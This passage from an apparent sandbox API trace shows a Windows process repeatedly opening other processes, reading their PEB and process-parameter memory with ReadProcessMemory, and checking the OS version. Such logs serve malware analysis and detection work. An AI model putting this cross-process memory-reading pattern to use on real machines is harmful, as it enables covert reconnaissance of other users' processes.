[0412.627] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c26e4, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.628] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.629] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.629] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.629] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.630] malloc (_Size=0x60) returned 0x2c0790
[0412.630] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c273c, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0412.630] free (_Block=0x2c0790)
[0412.631] CloseHandle (hObject=0x24c) returned 1
[0412.632] _ui64tow (_Value=0xa2c, _Buffer="2596", _Radix=10) returned="2604"
[0412.636] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2604") returned 4
[0412.637] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.637] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.704] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x24c
[0412.704] GetLastError () returned 0x0
[0412.704] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x202950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.705] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2026f0, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.706] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.708] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.708] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.708] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x201ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.708] malloc (_Size=0x82) returned 0x2e3b90
[0412.708] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x20276a, lpBuffer=0x2e3b90, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0412.708] free (_Block=0x2e3b90)
[0412.709] CloseHandle (hObject=0x24c) returned 1
[0412.711] _ui64tow (_Value=0xbb4, _Buffer="2604", _Radix=10) returned="2996"
[0412.715] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2996") returned 4
[0412.716] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.716] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x24c
[0412.739] GetLastError () returned 0x0
[0412.740] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.740] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd26f2, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.742] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.743] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.743] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.743] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.743] malloc (_Size=0x6c) returned 0x2c1680
[0412.743] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xd2756, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.744] free (_Block=0x2c1680)
[0412.744] CloseHandle (hObject=0x24c) returned 1
[0412.745] _ui64tow (_Value=0xbbc, _Buffer="2996", _Radix=10) returned="3004"
[0412.750] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3004") returned 4
[0412.751] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.751] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.777] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x24c
[0412.778] GetLastError () returned 0x0
[0412.778] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x572900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.778] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5726ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.779] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.781] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.781] malloc (_Size=0x68) returned 0x2c0800
[0412.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x57274e, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0412.781] free (_Block=0x2c0800)
[0412.782] CloseHandle (hObject=0x24c) returned 1
[0412.783] _ui64tow (_Value=0xbc4, _Buffer="3004", _Radix=10) returned="3012"
[0412.787] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3012") returned 4
[0412.789] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.789] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.809] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x24c
[0412.809] GetLastError () returned 0x0
[0412.810] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x432910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.810] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4326e4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.811] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.812] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.813] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.813] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.813] malloc (_Size=0x70) returned 0x2c1680
[0412.813] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x43274c, lpBuffer=0x2c1680, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.813] free (_Block=0x2c1680)
[0412.814] CloseHandle (hObject=0x24c) returned 1
[0412.815] _ui64tow (_Value=0xbcc, _Buffer="3012", _Radix=10) returned="3020"
[0412.819] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3020") returned 4
[0412.820] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.820] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.841] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbcc) returned 0x24c
[0412.841] GetLastError () returned 0x0
[0412.841] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.841] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.842] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.842] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f2900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.842] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f26ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.843] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.844] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.844] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.844] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.845] malloc (_Size=0x68) returned 0x2c0800
[0412.845] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3f274e, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0412.845] free (_Block=0x2c0800)
[0412.846] CloseHandle (hObject=0x24c) returned 1
[0412.846] _ui64tow (_Value=0xbd4, _Buffer="3020", _Radix=10) returned="3028"
[0412.851] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3028") returned 4
[0412.852] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.852] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd4) returned 0x24c
[0412.879] GetLastError () returned 0x0
[0412.879] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.879] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.879] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.880] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1328f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.880] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1326e8, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.881] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.882] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.882] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.883] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x131ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.883] malloc (_Size=0x62) returned 0x2c0790
[0412.883] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x132742, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0412.883] free (_Block=0x2c0790)
[0412.884] CloseHandle (hObject=0x24c) returned 1
[0412.885] _ui64tow (_Value=0xbdc, _Buffer="3028", _Radix=10) returned="3036"
[0412.889] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3036") returned 4
[0412.891] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.891] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.914] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x24c
[0412.914] GetLastError () returned 0x0
[0412.914] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.914] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.915] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.915] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x502930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.915] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5026f4, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.916] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.917] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.917] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.917] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x501ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.918] malloc (_Size=0x74) returned 0x2c1680
[0412.918] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x502760, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.918] free (_Block=0x2c1680)
[0412.919] CloseHandle (hObject=0x24c) returned 1
[0412.920] _ui64tow (_Value=0xbe4, _Buffer="3036", _Radix=10) returned="3044"
[0412.924] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3044") returned 4
[0412.925] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.925] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.947] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x24c
[0412.947] GetLastError () returned 0x0
[0412.947] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.947] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.948] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.948] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2428f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.948] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2426e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
